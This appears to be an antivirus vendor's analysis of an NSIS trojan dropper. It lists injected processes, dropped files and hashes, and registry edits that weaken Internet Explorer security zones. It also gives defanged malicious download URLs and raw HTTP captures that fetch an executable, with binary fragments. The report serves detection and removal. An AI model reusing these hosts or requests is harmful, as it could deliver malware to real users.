Trojan.NSIS.StartPage_def705210c – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):

NojM0TDHJX.exe:1980
%original file name%.exe:1616
cpSetup.exe:568

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process NojM0TDHJX.exe:1980 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (0 bytes)

The process %original file name%.exe:1616 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)

The process cpSetup.exe:568 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp (0 bytes)

Registry activity

The process NojM0TDHJX.exe:1980 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 64 0C 52 E7 45 47 39 B5 A1 0E DB 47 CB 74 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1616 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 EC 84 9D 20 C2 B7 54 FE 10 CF EE 5B 8C DB 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:568 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 05 05 B2 D0 2E A7 87 C1 BB E1 4E E3 6B C7 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5	File path
8ec3a46db0f5d311571b3c0c62dc0d05	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00074d91.a
e8f5383b782fee176aff1ff243f1f501	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00075542.a
a5f8399a743ab7f9c88c645c35b1ebb5	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NSISdl.dll
905d7368f8c25e0b12e6c5c1e036e7b7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe
c17103ae9072a06da581dec998343fc1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\System.dll
33ec04738007e665059cf40bc0f0c22b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\BgWorker.dll
a5f8399a743ab7f9c88c645c35b1ebb5	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\System.dll
30741f682e9d12149beb9266fb790426	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\cpSetup.exe
6206b94f91e92b7f7f72214c438dd414	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsArray.dll
c10e04dd4ad4277d5adc951bb331c777	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsDialogs.dll
0309822592797cc6d1052d2735f20065	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	40960	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	233472	45048	45056	2.26212	5fffcf2497e851763fd62f4eee795079

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA	52.17.177.26
hxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA	54.239.168.162
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA	54.239.168.162
hxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA	54.88.21.193
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57	54.239.168.162
hxxp://get.fc-gosh.biz/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe	54.239.168.254
hxxp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial	54.239.168.173
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA	52.17.177.26
hxxp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11	54.239.168.42
hxxp://tap.winre.xyz/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1	54.239.168.70
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA	54.239.168.162
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA	54.239.168.162
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57	54.239.168.162
hxxp://up.int-cp2-234.xyzhxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA	54.88.21.193

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 HTTP/1.1

Host: up.int-cp-234.xyz

Connection: close

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 409128

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 13 Aug 2015 00:45:51 GMT

X-Cache: Miss from cloudfront

Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 3AgamjltkJULGHtW2r49AY2gNqm91hyzrbUxeYApaBL7338gzXHjPw==

.!.:M.(........FKz)N..8..7.\...... ....bT......#....._......_h....`....9K....w..f......o&.].fg..z%..6....m....B..,.L.A....p........F.zN......N.W....).H.,\......Qe....M....-.2........d...D.H.r'!.t6].|.....Y.:u.0.p....n.8...w$.T.)....0.'fs.........(......8b69....-.p...Ee...\..o...[.X...e.e.i./.C...Qhd..nMyO.EH2F.E.M.N..?.<'...(t...Vw...L.]...<....].c...u*/.9...G.W.;..~.f.&L6...".5.T~s.V.=..#hM5v7.e/A#.q..n.e.K..S....E..t../..(.w.......-..NEfg3...D.`...P..#w.p..=);.J$Vs.g..._.Lb..t.q..._...r.].......J.-.7'...*....zB...: ...e.gY}3^4.TA.jv..l..~)]u@w..z.....$...BU.@.......Ff.#.9xD..F.>.D...qS~.i...3...%....~...."z.x...Ww.....)1.I.vQ8}...UC...3 V..;D.wR..@.y..Hh ?........!AH...I..=.g......[.Pog.u. .6.!|h.@Xe.&3eI.....R..s.2.==|1..$.u".....}.........E....o..E....O.r.....T0....R....Y.'...$......q.c...kf......j....&..M>E....U.(....48h.Y.8..og........I.V.z....7..U..E|..(..\....T)H.<wZ..V..gm....jY.T...Xu.]y....{-..2..8.l....`.......a.I". w.YR.g.......C...........N.-..........Zet7y.`...()..#Hv..)...^?.t..^.Vx..YS;..!.l.W43]L!#d{.F..[T......Y...Q.,.......#_z.j..o%.*R....3...?..-O@....1.G.k.^.......|.s..e..!.a.j`...'..un.S.......GQf.!..is/..;l..1o.J<2 4..[.3...E..ip."..4....h8....LX...l.........s....?..?...4v#.h....IM.nW..4...hX.%9.....'..r?aw.90...t.y..V.p....jN......?...p.|K[a.n..s?v.*..Pl..%......b....^p..]0.\i..naq9..|.x. .p(....:._?.@.V.....l_<..R........^....tW..|P%3....Y'=...(...../"..#b.......`"eam.d.4..Z.9.|...K... ..7.o.nS.G..$9s.(...........NI........n.......G.F.o.]UH...hG).......\r.On4..p..b

<<< skipped >>>

GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA HTTP/1.1

Host: capital.go2cloud.org

Connection: close

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Thu, 13 Aug 2015 00:45:52 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.7.9

Set-Cookie: enc_aff_session_4=ENC02414-102e22fe3dd0a0bd118638fce028d4-1006-4-0-0-0-0-UA-2-3131-373335-34323732313332-30-30-30-193.138.244.231-20150812204552-_-7B11052C012208017E2C3146051A2D427132034F4D51525A1C494616244946210D1A4E041130124B55; expires=Sat, 12 Sep 2015 00:45:52 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Sat, 07 Jul 2018 11:25:52 GMT; path=/;

tracking_id: 102e22fe3dd0a0bd118638fce028d4

X-Robots-Tag: noindex, nofollow

Content-Length: 324

Connection: Close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA">here</a>.</p>.</body></html>...

<<< skipped >>>

POST hXXp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1

Host: up.int-cp2-234.xyz

Connection: close

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57

HTTP/1.1 411 Length Required

Content-Type: text/html; charset=us-ascii

Server: Microsoft-HTTPAPI/2.0

Date: Thu, 13 Aug 2015 00:45:50 GMT

Connection: close

Content-Length: 344

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>..<BODY><h2>Length Required</h2>..<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>..</BODY></HTML>....

GET hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA HTTP/1.1

Host: up.int-cp-234.xyz

Connection: close

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 28712

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 13 Aug 2015 00:45:50 GMT

X-Cache: Miss from cloudfront

Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)

X-Amz-Cf-Id: CHp6udWsvm6AJ4HQDfzA_lXU5e5L8IiqwlpdvQBL11cRTsy-wygohQ==

B=.#...]...5<..{wU..........H.....U.M.VW.c.x.4J...:v..U..s\#...^......-O ..v..d...~.!x...9.[...).y.:...)<G.!]......E....j[....,...K.....b...--E.Y.Ib'..o....W./...za.ba0..:....)y1t_.B..s.y...pMRf.*.t.y........T.T.R.9\.U`....KAe.....................H].."W.V."{JBJ............f...^.....>.....f.d...[L;........P.U..Vm.....z|.t....;.w...9..(..e...Z......r5M.QU.. g.y......r.....q....5..m...;7q...6.....WB.F..........SS....n.....9...._$......:..it. ..~..B.._........|.X3.d..<..0........T..4.2..#Y&,....Ak......C.O.5....9......5.&...G/.|..`.k.^2..t...#...B13:.9.[U$.82.H......N..z.w.;.T../.(V|.?...m.X..q.~......{...........q..*...giu.........U.R.>.>.9G..w....UB@_r|J...... .>R(....SHo......X....O....j..R.QW....H.hQ..,9....8.<b.r.C.T..*9...F.4..q...%>h...o3..P.kp .A...N?.$.(?....,.@g..Iy....AqzydfN....5.qSYdB..#[....2A]mi...c..{..g..u.... .$:?d.T_..80uQ...1&....tP....w.:.$.."..c.B.*..4..^.:...4aW..9]...a.....3:0.........U,..%.|.M.a#s... ......'xl..7P...P.`........b..[."...J...[S.....y..Bx.........(..m....l... .....IW..4.....U~b.....rq.`.."..1.J.. ....3.]u..N[.T8.$..W.V..\/......G `4..F.....S........p}.&...A.....An..W....F a....`.>.......5..'.X.g!9...Q..#=..<...V.c?....P{...I.8.<~ds.N.S........*.@e..4v$....U.G.........._X.vS.`&.,..._&... =6f..M.j .E......*./.hF.I....g....,w...G.YVP... ..6..5.e.....c....B../.-...g.'..{..e.]................t..t..i=....*....WB`.t*.....V..u^.&......L..Q\Q..S .62...2G.*..1e2e.ng..._......$.[H.......h.....[..rN2U..!.=..-........2...h.;..S.D....>...`...\.S.z....7

<<< skipped >>>

GET /stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial HTTP/1.0

Host: dl.fripp54.xyz

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 76885

Connection: close

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="55cbe8acafcad.exe"

X-Powered-By: ASP.NET

Date: Thu, 13 Aug 2015 00:45:33 GMT

X-Cache: Miss from cloudfront

Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: z8nqj6gQgmuWKT9oAIJTJr8kmfMfy_E9gLa5dRx5WTeY2Vba9TMkZg==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s...........@...........................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata...@...@...........................rsrc....@.......B...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

